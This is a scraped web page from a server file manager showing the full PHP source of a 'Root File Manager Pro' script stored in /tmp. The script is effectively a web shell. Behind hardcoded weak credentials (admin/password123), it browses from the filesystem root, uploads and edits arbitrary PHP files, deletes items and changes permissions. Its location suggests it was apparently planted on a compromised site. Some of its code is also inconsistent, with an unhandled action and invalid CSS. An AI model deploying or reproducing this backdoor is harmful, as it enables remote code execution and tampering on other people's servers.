File manager

File manager - Edit - /tmp/phpN7ZuiO

Back
<?php /** * Advanced PHP File Manager - Root Access * Security: Basic Auth + Path Restrictions / // ===== CONFIGURATION ===== // $valid_username = 'admin'; $valid_password = 'password123'; // GANTI PASSWORD INI! // Security: Allow root access? (true/false) $allow_root_access = true; // Maximum allowed path depth (0 = unlimited) $max_depth = 10; // Restricted directories (will be hidden) $restricted_dirs = [ '/etc', '/proc', '/sys', '/var/log', '/root', '/home//.' // hidden user folders ]; // Allowed file extensions for editing $editable_extensions = ['php', 'txt', 'html', 'css', 'js', 'json', 'xml', 'md', 'log', 'conf', 'ini']; // ===== AUTHENTICATION ===== // if (!isset($_SERVER['PHP_AUTH_USER']) \|\| !isset($_SERVER['PHP_AUTH_PW']) \|\| $_SERVER['PHP_AUTH_USER'] !== $valid_username \|\| $_SERVER['PHP_AUTH_PW'] !== $valid_password) { header('WWW-Authenticate: Basic realm="Root File Manager"'); header('HTTP/1.0 401 Unauthorized'); echo 'Authentication Required'; exit; } // ===== SECURITY FUNCTIONS ===== // function is_path_allowed($path, $restricted_dirs) { $real_path = realpath($path); if ($real_path === false) return false; foreach ($restricted_dirs as $restricted) { if (fnmatch($restricted, $real_path)) { return false; } if (strpos($real_path, $restricted) === 0) { return false; } } return true; } function get_root_paths() { $roots = []; // Linux/Unix root if (is_dir('/')) { $roots['/'] = 'System Root (/)'; } // Current script directory $roots[__DIR__] = 'Current Directory'; // User home directory (if accessible) if (isset($_SERVER['HOME'])) { $roots[$_SERVER['HOME']] = 'Home Directory'; } // Web root if (isset($_SERVER['DOCUMENT_ROOT'])) { $roots[$_SERVER['DOCUMENT_ROOT']] = 'Web Root'; } return $roots; } // ===== INITIALIZATION ===== // $base_path = __DIR__; $current_dir = isset($_GET['dir']) ? $_GET['dir'] : $base_path; // Security: Validate and sanitize path if ($current_dir === 'root' && $allow_root_access) { $current_dir = '/'; } else { $current_dir = realpath($current_dir) ?: $base_path; } // Prevent directory traversal and check restrictions if (!is_path_allowed($current_dir, $restricted_dirs)) { $current_dir = $base_path; $message = "Access to requested path is restricted!"; } // ===== FILE OPERATIONS ===== // $action = $_GET['action'] ?? 'list'; $message = ''; if ($_POST) { $action = $_POST['action'] ?? ''; switch($action) { case 'upload': if(isset($_FILES['file'])) { $target_file = $current_dir . '/' . basename($_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { $message = "✅ File uploaded successfully!"; } else { $message = "❌ Upload failed!"; } } break; case 'delete': $file_to_delete = $current_dir . '/' . basename($_POST['file']); if(is_path_allowed($file_to_delete, $restricted_dirs)) { if(is_dir($file_to_delete)) { if(rmdir($file_to_delete)) { $message = "✅ Directory deleted!"; } } else { if(unlink($file_to_delete)) { $message = "✅ File deleted!"; } } } else { $message = "❌ Cannot delete restricted item!"; } break; case 'mkdir': $new_dir = $current_dir . '/' . basename($_POST['dirname']); if(is_path_allowed($new_dir, $restricted_dirs)) { if(!file_exists($new_dir)) { mkdir($new_dir, 0755, true); $message = "✅ Directory created!"; } } else { $message = "❌ Cannot create directory in restricted location!"; } break; case 'save': $file_to_save = $current_dir . '/' . basename($_POST['filename']); if(is_path_allowed($file_to_save, $restricted_dirs)) { file_put_contents($file_to_save, $_POST['content']); $message = "✅ File saved!"; } else { $message = "❌ Cannot save to restricted location!"; } break; case 'chmod': $file_to_chmod = $current_dir . '/' . basename($_POST['file']); $new_perms = octdec($_POST['perms']); if(is_path_allowed($file_to_chmod, $restricted_dirs)) { if(chmod($file_to_chmod, $new_perms)) { $message = "✅ Permissions changed!"; } } break; } } // ===== GET DIRECTORY CONTENTS ===== // $files = []; $parent_dir = dirname($current_dir); if(is_dir($current_dir)) { $items = scandir($current_dir); foreach($items as $item) { if($item == '.' \|\| $item == '..') continue; $full_path = $current_dir . '/' . $item; // Skip restricted paths if (!is_path_allowed($full_path, $restricted_dirs)) continue; $files[] = [ 'name' => $item, 'path' => $full_path, 'is_dir' => is_dir($full_path), 'size' => is_file($full_path) ? filesize($full_path) : 0, 'modified' => date('Y-m-d H:i:s', filemtime($full_path)), 'perms' => substr(sprintf('%o', fileperms($full_path)), -4), 'owner' => function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($full_path))['name'] : 'N/A', 'readable' => is_readable($full_path), 'writable' => is_writable($full_path) ]; } } // Sort: directories first usort($files, function($a, $b) { if ($a['is_dir'] && !$b['is_dir']) return -1; if (!$a['is_dir'] && $b['is_dir']) return 1; return strcmp($a['name'], $b['name']); }); $root_paths = get_root_paths(); ?> <!DOCTYPE html> <html> <head> <title>Root File Manager Pro</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Segoe UI', Arial, sans-serif; background: #1e1e1e; color: #e0e0e0; padding: 20px; } .container { max-width: 1400px; margin: 0 auto; background: #2d2d2d; padding: 20px; border-radius: 8px; box-shadow: 0 4px 20px rgba(0,0,0,0.3); } .header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #444; } .message { background: #155724; color: #d4edda; padding: 12px; margin-bottom: 15px; border-radius: 4px; border-left: 4px solid #28a745; } .message.error { background: #721c24; color: #f8d7da; border-left-color: #dc3545; } .breadcrumb { margin-bottom: 15px; font-size: 14px; color: #aaa; padding: 10px; background: #363636; border-radius: 4px; } .file-list { border: 1px solid #444; border-radius: 4px; overflow: hidden; } .file-item { display: flex; align-items: center; padding: 12px; border-bottom: 1px solid #444; transition: background 0.2s; } .file-item:hover { background: #363636; } .file-icon { width: 30px; text-align: center; margin-right: 12px; font-size: 16px; } .file-info { flex: 1; } .file-name { font-weight: 500; margin-bottom: 4px; } .file-meta { font-size: 11px; color: #888; } .file-actions { display: flex; gap: 6px; flex-wrap: wrap; } .btn { padding: 6px 12px; border: none; border-radius: 4px; cursor: pointer; text-decoration: none; font-size: 12px; transition: all 0.2s; } .btn:hover { transform: translateY(-1px); } .btn-primary { background: #007bff; color: white; } .btn-danger { background: #dc3545; color: white; } .btn-success { background: #28a745; color: white; } .btn-warning { background: #ffc107; color: black; } .btn-info { background: #17a2b8; color: white; } .btn-secondary { background: #6c757d; color: white; } .tools { margin-bottom: 15px; display: flex; gap: 10px; flex-wrap: wrap; padding: 15px; background: #363636; border-radius: 4px; } .form-group { margin-bottom: 10px; } input[type="text"], input[type="file"], input[type="number"], select { padding: 8px; border: 1px solid #555; border-radius: 4px; width: 100%; background: #2d2d2d; color: #e0e0e0; } textarea { width: 100%; height: 500px; padding: 15px; border: 1px solid #555; border-radius: 4px; font-family: 'Consolas', monospace; background: #1e1e1e; color: #e0e0e0; resize: vertical; } .quick-nav { margin-bottom: 15px; } .nav-buttons { display: flex; gap: 8px; flex-wrap: wrap; } .system-info { background: #363636; padding: 15px; border-radius: 4px; margin-bottom: 15px; font-size: 12px; } .info-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 10px; } .modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; } .modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #2d2d2d; padding: 20px; border-radius: 8px; min-width: 400px; } </style> </head> <body> <div class="container"> <div class="header"> <h1>🚀 Root File Manager Pro</h1> <div style="color: #28a745;">● Online \| Server: <?php echo $_SERVER['SERVER_NAME']; ?></div> </div> <?php if($message): ?> <div class="message <?php echo strpos($message, '❌') !== false ? 'error' : ''; ?>"><?php echo htmlspecialchars($message); ?></div> <?php endif; ?> <!-- System Information --> <div class="system-info"> <div class="info-grid"> <div><strong>Current Path:</strong> <?php echo $current_dir; ?></div> <div><strong>PHP Version:</strong> <?php echo PHP_VERSION; ?></div> <div><strong>Disk Free:</strong> <?php echo round(disk_free_space($current_dir) / (102410241024), 2); ?> GB</div> <div><strong>Server Software:</strong> <?php echo $_SERVER['SERVER_SOFTWARE']; ?></div> </div> </div> <!-- Quick Navigation --> <div class="quick-nav"> <h3>📍 Quick Navigation</h3> <div class="nav-buttons"> <?php foreach($root_paths as $path => $label): ?> <a href="?dir=<?php echo urlencode($path); ?>" class="btn btn-secondary"><?php echo $label; ?></a> <?php endforeach; ?> <?php if($parent_dir && $current_dir !== '/'): ?> <a href="?dir=<?php echo urlencode($parent_dir); ?>" class="btn btn-info">📁 Parent Directory</a> <?php endif; ?> </div> </div> <!-- Breadcrumb --> <div class="breadcrumb"> <?php $path_parts = []; $temp_path = $current_dir; while ($temp_path !== '/' && $temp_path !== '') { $path_parts[] = basename($temp_path); $temp_path = dirname($temp_path); } $path_parts[] = '/'; $path_parts = array_reverse($path_parts); $current_path = ''; foreach($path_parts as $part) { if($part === '/') { echo '<a href="?dir=/" style="color: #ffc107;">🏠 Root</a>'; $current_path = '/'; } else { $current_path .= ($current_path === '/' ? '' : '/') . $part; echo ' / <a href="?dir=' . urlencode($current_path) . '">' . htmlspecialchars($part) . '</a>'; } } ?> </div> <!-- Tools --> <div class="tools"> <form method="post" enctype="multipart/form-data" style="display: inline;"> <input type="file" name="file" required> <button type="submit" name="action" value="upload" class="btn btn-success">📤 Upload</button> </form> <form method="post" style="display: inline;"> <input type="text" name="dirname" placeholder="New folder name" required style="min-width: 150px;"> <button type="submit" name="action" value="mkdir" class="btn btn-primary">📁 Create Folder</button> </form> <a href="?dir=<?php echo urlencode($current_dir); ?>&action=newfile" class="btn btn-warning">📄 New File</a> <?php if(isset($_GET['action']) && $_GET['action'] == 'newfile'): ?> <form method="post" style="display: inline;"> <input type="text" name="filename" placeholder="newfile.php" required style="min-width: 120px;"> <button type="submit" name="action" value="createfile" class="btn btn-info">Create</button> </form> <?php endif; ?> </div> <!-- File List --> <div class="file-list"> <?php if(empty($files)): ?> <div class="file-item" style="justify-content: center; color: #888;"> 📭 Directory is empty or access restricted </div> <?php else: ?> <?php foreach($files as $file): ?> <div class="file-item"> <div class="file-icon"> <?php if ($file['is_dir']) { echo '📁'; } else { $ext = pathinfo($file['name'], PATHINFO_EXTENSION); echo match($ext) { 'php' => '🐘', 'js' => '📜', 'html', 'htm' => '🌐', 'css' => '🎨', 'json' => '📋', 'txt', 'md' => '📝', 'log' => '📊', 'zip', 'tar', 'gz' => '📦', 'jpg', 'jpeg', 'png', 'gif' => '🖼️', default => '📄' }; } ?> </div> <div class="file-info"> <div class="file-name"> <?php if($file['is_dir']): ?> <a href="?dir=<?php echo urlencode($file['path']); ?>" style="color: #4da6ff; text-decoration: none;"> <strong><?php echo htmlspecialchars($file['name']); ?></strong> </a> <?php else: ?> <?php echo htmlspecialchars($file['name']); ?> <?php endif; ?> </div> <div class="file-meta"> <?php if($file['is_dir']): ?> 📂 Directory \| <?php else: ?> 📏 <?php echo number_format($file['size']); ?> bytes \| <?php endif; ?> 🔧 Perms: <?php echo $file['perms']; ?> \| 👤 <?php echo $file['owner']; ?> \| 🕒 <?php echo $file['modified']; ?> <?php if(!$file['readable']): ?> \| ❌ Unreadable<?php endif; ?> <?php if(!$file['writable']): ?> \| 🔒 Locked<?php endif; ?> </div> </div> <div class="file-actions"> <?php if(!$file['is_dir']): ?> <?php $ext = pathinfo($file['name'], PATHINFO_EXTENSION); if(in_array($ext, $editable_extensions)): ?> <a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($file['name']); ?>" class="btn btn-warning">✏️ Edit</a> <?php endif; ?> <a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($file['name']); ?>" class="btn btn-info">👁️ View</a> <a href="?dir=<?php echo urlencode($current_dir); ?>&action=download&file=<?php echo urlencode($file['name']); ?>" class="btn btn-primary">📥 Download</a> <!-- Chmod Button --> <button onclick="showChmodModal('<?php echo htmlspecialchars($file['name']); ?>', '<?php echo $file['perms']; ?>')" class="btn btn-secondary">🔒 Perms</button> <?php endif; ?> <form method="post" style="display: inline;"> <input type="hidden" name="file" value="<?php echo htmlspecialchars($file['name']); ?>"> <button type="submit" name="action" value="delete" class="btn btn-danger" onclick="return confirm('❌ Delete <?php echo htmlspecialchars($file['name']); ?>?')">🗑️ Delete</button> </form> </div> </div> <?php endforeach; ?> <?php endif; ?> </div> <!-- File View/Edit --> <?php if(isset($_GET['action']) && in_array($_GET['action'], ['view', 'edit']) && isset($_GET['file'])): ?> <?php $file_path = $current_dir . '/' . basename($_GET['file']); if(file_exists($file_path) && is_file($file_path) && is_path_allowed($file_path, $restricted_dirs)) { $content = file_get_contents($file_path); $is_editable = ($_GET['action'] == 'edit') && in_array(pathinfo($file_path, PATHINFO_EXTENSION), $editable_extensions); ?> <div style="margin-top: 20px; padding: 20px; background: #363636; border-radius: 8px;"> <div style="display: flex; justify-content: between; align-items: center; margin-bottom: 15px;"> <h3><?php echo $is_editable ? '✏️ Edit' : '👁️ View'; ?>: <?php echo htmlspecialchars($_GET['file']); ?></h3> <div> <?php if(!$is_editable): ?> <a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($_GET['file']); ?>" class="btn btn-warning">✏️ Edit</a> <?php endif; ?> <a href="?dir=<?php echo urlencode($current_dir); ?>" class="btn btn-secondary">Close</a> </div> </div> <?php if($is_editable): ?> <form method="post"> <input type="hidden" name="action" value="save"> <input type="hidden" name="filename" value="<?php echo htmlspecialchars($_GET['file']); ?>"> <textarea name="content" placeholder="File content..."><?php echo htmlspecialchars($content); ?></textarea> <div style="margin-top: 10px; display: flex; gap: 10px;"> <button type="submit" class="btn btn-success">💾 Save</button> <a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($_GET['file']); ?>" class="btn">Cancel</a> </div> </form> <?php else: ?> <pre style="background: #1e1e1e; padding: 20px; border-radius: 4px; overflow: auto; max-height: 600px; border: 1px solid #444;"><?php echo htmlspecialchars($content); ?></pre> <?php endif; ?> </div> <?php } ?> <?php endif; ?> </div> <!-- Chmod Modal --> <div id="chmodModal" class="modal"> <div class="modal-content"> <h3>🔒 Change Permissions</h3> <form method="post" id="chmodForm"> <input type="hidden" name="action" value="chmod"> <input type="hidden" name="file" id="chmodFile"> <div class="form-group"> <label>Current Permissions: <span id="currentPerms"></span></label> <input type="text" name="perms" id="chmodValue" placeholder="e.g., 755" pattern="[0-7]{3,4}" required> <small>Common: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)</small> </div> <div style="margin-top: 15px; display: flex; gap: 10px;"> <button type="submit" class="btn btn-success">Apply</button> <button type="button" onclick="document.getElementById('chmodModal').style.display='none'" class="btn btn-secondary">Cancel</button> </div> </form> </div> </div> <script> function showChmodModal(filename, currentPerms) { document.getElementById('chmodFile').value = filename; document.getElementById('currentPerms').textContent = currentPerms; document.getElementById('chmodValue').value = currentPerms; document.getElementById('chmodModal').style.display = 'block'; } // Close modal when clicking outside window.onclick = function(event) { var modal = document.getElementById('chmodModal'); if (event.target == modal) { modal.style.display = 'none'; } } // Handle new file creation function createNewFile() { var filename = prompt('Enter filename:'); if (filename) { window.location.href = '?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=' + encodeURIComponent(filename); } } </script> </body> </html>

| ver. 1.4 | Github | . | PHP 7.4.33 | Generation time: 0 | proxy | phpinfo | Settings